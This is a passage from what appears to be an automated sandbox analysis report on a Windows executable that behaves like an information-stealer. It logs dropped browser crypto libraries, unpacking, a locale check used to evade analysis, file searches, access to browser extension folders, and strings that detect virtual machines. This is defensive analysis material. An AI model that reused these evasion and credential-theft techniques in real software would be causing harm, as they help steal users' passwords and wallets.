                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeSection loaded: mozglue.dllJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeSection loaded: wsock32.dllJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeSection loaded: vcruntime140.dllJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeSection loaded: msvcp140.dllJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeSection loaded: pcacli.dllJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                      Source: Google Drive.lnk.2.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                      Source: YouTube.lnk.2.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                      Source: Sheets.lnk.2.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                      Source: Gmail.lnk.2.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                      Source: Slides.lnk.2.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                      Source: Docs.lnk.2.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                      Source: Binary string: mozglue.pdbP source: hwWxZRwpeL.exe, 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
                      Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
                      Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
                      Source: Binary string: nss3.pdb@ source: hwWxZRwpeL.exe, 00000000.00000002.2611115895.000000006C80F000.00000002.00000001.01000000.00000012.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
                      Source: Binary string: my_library.pdbU source: hwWxZRwpeL.exe, 00000000.00000003.2044823834.0000000002550000.00000004.00001000.00020000.00000000.sdmp, hwWxZRwpeL.exe, 00000000.00000002.2611509049.000000006CFD1000.00000002.00000001.01000000.00000007.sdmp, hwWxZRwpeL.exe, 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, hwWxZRwpeL.exe, 00000000.00000002.2589754739.0000000002470000.00000040.00001000.00020000.00000000.sdmp, chrome.dll.0.dr
                      Source: Binary string: my_library.pdb source: hwWxZRwpeL.exe, hwWxZRwpeL.exe, 00000000.00000003.2044823834.0000000002550000.00000004.00001000.00020000.00000000.sdmp, hwWxZRwpeL.exe, 00000000.00000002.2611509049.000000006CFD1000.00000002.00000001.01000000.00000007.sdmp, hwWxZRwpeL.exe, 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, hwWxZRwpeL.exe, 00000000.00000002.2589754739.0000000002470000.00000040.00001000.00020000.00000000.sdmp, chrome.dll.0.dr
                      Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
                      Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
                      Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
                      Source: Binary string: nss3.pdb source: hwWxZRwpeL.exe, 00000000.00000002.2611115895.000000006C80F000.00000002.00000001.01000000.00000012.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
                      Source: Binary string: mozglue.pdb source: hwWxZRwpeL.exe, 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
                      Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

                      Data Obfuscation

                      barindex
                      Detected unpacking (changes PE section rights)
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeUnpacked PE file: 0.2.hwWxZRwpeL.exe.400000.1.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                      Detected unpacking (overwrites its own PE header)
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeUnpacked PE file: 0.2.hwWxZRwpeL.exe.400000.1.unpack
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_0040A090 LoadLibraryA,GetProcAddress,GetProcAddress,FreeLibrary,0_2_0040A090
                      Source: freebl3.dll.0.drStatic PE information: section name: .00cfg
                      Source: freebl3[1].dll.0.drStatic PE information: section name: .00cfg
                      Source: mozglue.dll.0.drStatic PE information: section name: .00cfg
                      Source: mozglue[1].dll.0.drStatic PE information: section name: .00cfg
                      Source: msvcp140.dll.0.drStatic PE information: section name: .didat
                      Source: msvcp140[1].dll.0.drStatic PE information: section name: .didat
                      Source: nss3.dll.0.drStatic PE information: section name: .00cfg
                      Source: nss3[1].dll.0.drStatic PE information: section name: .00cfg
                      Source: softokn3.dll.0.drStatic PE information: section name: .00cfg
                      Source: softokn3[1].dll.0.drStatic PE information: section name: .00cfg
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_0041B335 push ecx; ret 0_2_0041B348
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_6C60B536 push ecx; ret 0_2_6C60B549
                      Source: hwWxZRwpeL.exeStatic PE information: section name: .text entropy: 7.618247709813183
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dllJump to dropped file
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile created: C:\ProgramData\chrome.dllJump to dropped file
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dllJump to dropped file
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dllJump to dropped file
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dllJump to dropped file
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dllJump to dropped file
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dllJump to dropped file
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile created: C:\ProgramData\chrome.dllJump to dropped file
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file

                      Boot Survival

                      barindex
                      Monitors registry run keys for changes
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_00419F20 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419F20
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Found evasive API chain (may stop execution after checking locale)
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-57108
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dllJump to dropped file
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeDropped PE file which has not been started: C:\ProgramData\chrome.dllJump to dropped file
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dllJump to dropped file
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dllJump to dropped file
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dllJump to dropped file
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dllJump to dropped file
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dllJump to dropped file
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_004140F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_004140F0
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_0040E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E530
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_0040BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE40
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_00414B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414B60
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00401710
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_0040DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DB80
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_0040F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F7B0
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_0040EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040EE20
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_00413B00 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00413B00
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_0040DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DF10
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_004147C0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_004147C0
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeCode function: 0_2_00418060 GetSystemInfo,wsprintfA,0_2_00418060
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                      Source: Amcache.hve.19.drBinary or memory string: VMware
                      Source: AEBGIEGC.0.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                      Source: AEBGIEGC.0.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                      Source: AEBGIEGC.0.drBinary or memory string: global block list test formVMware20,11696428655
                      Source: Amcache.hve.19.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.00000000007ED000.00000004.00000020.00020000.00000000.sdmp, hwWxZRwpeL.exe, 00000000.00000002.2589210016.000000000078E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: AEBGIEGC.0.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                      Source: Amcache.hve.19.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                      Source: AEBGIEGC.0.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2610154888.0000000027EE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\'W
                      Source: Amcache.hve.19.drBinary or memory string: vmci.sys
                      Source: AEBGIEGC.0.drBinary or memory string: AMC password management pageVMware20,11696428655
                      Source: AEBGIEGC.0.drBinary or memory string: tasks.office.comVMware20,11696428655o
                      Source: AEBGIEGC.0.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                      Source: AEBGIEGC.0.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                      Source: AEBGIEGC.0.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                      Source: Amcache.hve.19.drBinary or memory string: VMware20,1
                      Source: Amcache.hve.19.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.19.drBinary or memory string: NECVMWar VMware SATA CD00
